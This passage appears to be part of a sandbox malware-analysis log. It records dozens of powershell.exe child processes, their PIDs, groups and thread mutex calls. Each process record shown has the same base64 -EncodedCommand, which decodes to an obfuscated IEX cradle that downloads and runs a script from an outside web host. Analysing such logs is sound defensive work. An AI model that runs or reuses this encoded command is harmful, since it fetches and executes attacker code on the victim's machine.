	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "68"
	os_parent_pid = "0xf98"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1389
	os_tid = 0x1f90

	[0714.686] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1437
	os_tid = 0x1c5c


Thread:
	id = 1465
	os_tid = 0x1e10


Thread:
	id = 2056
	os_tid = 0x182c


Thread:
	id = 2057
	os_tid = 0x7f8


Thread:
	id = 2060
	os_tid = 0x7d8


Thread:
	id = 2095
	os_tid = 0xd64


Process:
	id = "230"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3ffa2000"
	os_pid = "0x1f94"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "96"
	os_parent_pid = "0x126c"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1390
	os_tid = 0x1f98

	[0747.333] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1608
	os_tid = 0x21bc


Thread:
	id = 1639
	os_tid = 0x2254


Thread:
	id = 1985
	os_tid = 0x26ec


Thread:
	id = 1991
	os_tid = 0x2704


Thread:
	id = 1993
	os_tid = 0x270c


Thread:
	id = 2073
	os_tid = 0x89c


Process:
	id = "231"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x13c78000"
	os_pid = "0x1fd0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1402
	os_tid = 0x1fd4

	[0859.500] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1926
	os_tid = 0x25fc


Thread:
	id = 1957
	os_tid = 0x267c


Process:
	id = "232"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x29786000"
	os_pid = "0x1600"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1423
	os_tid = 0x1b18

	[0858.770] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1913
	os_tid = 0x25c0


Thread:
	id = 1939
	os_tid = 0x2630


Process:
	id = "233"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x20894000"
	os_pid = "0x1d4c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1441
	os_tid = 0x1b58

	[0729.461] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1480
	os_tid = 0x1a4c


Thread:
	id = 1492
	os_tid = 0x16f0


Thread:
	id = 1901
	os_tid = 0x2584


Thread:
	id = 1911
	os_tid = 0x25b8


Thread:
	id = 1969
	os_tid = 0x26ac


Thread:
	id = 2070
	os_tid = 0x18d4


Process:
	id = "234"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6b4a2000"
	os_pid = "0x1a50"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1466
	os_tid = 0x10f0

	[0859.956] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1927
	os_tid = 0x2600


Thread:
	id = 1958
	os_tid = 0x2680


Process:
	id = "235"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x634b0000"
	os_pid = "0xa00"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1475
	os_tid = 0x1e04

	[0795.316] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1731
	os_tid = 0x1f44


Thread:
	id = 1743
	os_tid = 0x1838


Process:
	id = "236"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x658bf000"
	os_pid = "0x8d4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1486
	os_tid = 0x1f88

	[0795.292] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1818
	os_tid = 0x1818


Thread:
	id = 1834
	os_tid = 0x2420


Process:
	id = "237"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5fdce000"
	os_pid = "0x1cbc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1495
	os_tid = 0x1cdc

	[0836.707] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1862
	os_tid = 0x24ac


Thread:
	id = 1877
	os_tid = 0x24f4


Process:
	id = "238"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x69edd000"
	os_pid = "0x1d48"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1513
	os_tid = 0x1880

	[0861.455] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1918
	os_tid = 0x25d4


Thread:
	id = 1943
	os_tid = 0x2644


Process:
	id = "239"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x490ff000"
	os_pid = "0x144c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "104"
	os_parent_pid = "0x1394"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1516
	os_tid = 0x15ec

	[0799.209] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1851
	os_tid = 0x2474


Thread:
	id = 1868
	os_tid = 0x24c4


Process:
	id = "240"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x551fe000"
	os_pid = "0x1de0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "88"
	os_parent_pid = "0x10f8"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1522
	os_tid = 0x1ad4

	[0794.299] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1753
	os_tid = 0x15ac


Thread:
	id = 1772
	os_tid = 0x2198


Thread:
	id = 2075
	os_tid = 0x2398


Thread:
	id = 2076
	os_tid = 0x24fc


Thread:
	id = 2077
	os_tid = 0x23f8


Thread:
	id = 2121
	os_tid = 0x224c


Process:
	id = "241"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3e367000"
	os_pid = "0x1ae4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1528
	os_tid = 0x2004

	[0782.924] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1749
	os_tid = 0x1d9c


Thread:
	id = 1761
	os_tid = 0x498


Thread:
	id = 2012
	os_tid = 0x2760


Thread:
	id = 2024
	os_tid = 0x2790


Thread:
	id = 2027
	os_tid = 0x279c


Thread:
	id = 2080
	os_tid = 0x1ea4


Process:
	id = "242"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x44663000"
	os_pid = "0x2024"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "51"
	os_parent_pid = "0xe7c"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1534
	os_tid = 0x2028

	[0758.180] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1607
	os_tid = 0x21b4


Thread:
	id = 1638
	os_tid = 0x2250


Process:
	id = "243"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2fe4d000"
	os_pid = "0x204c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
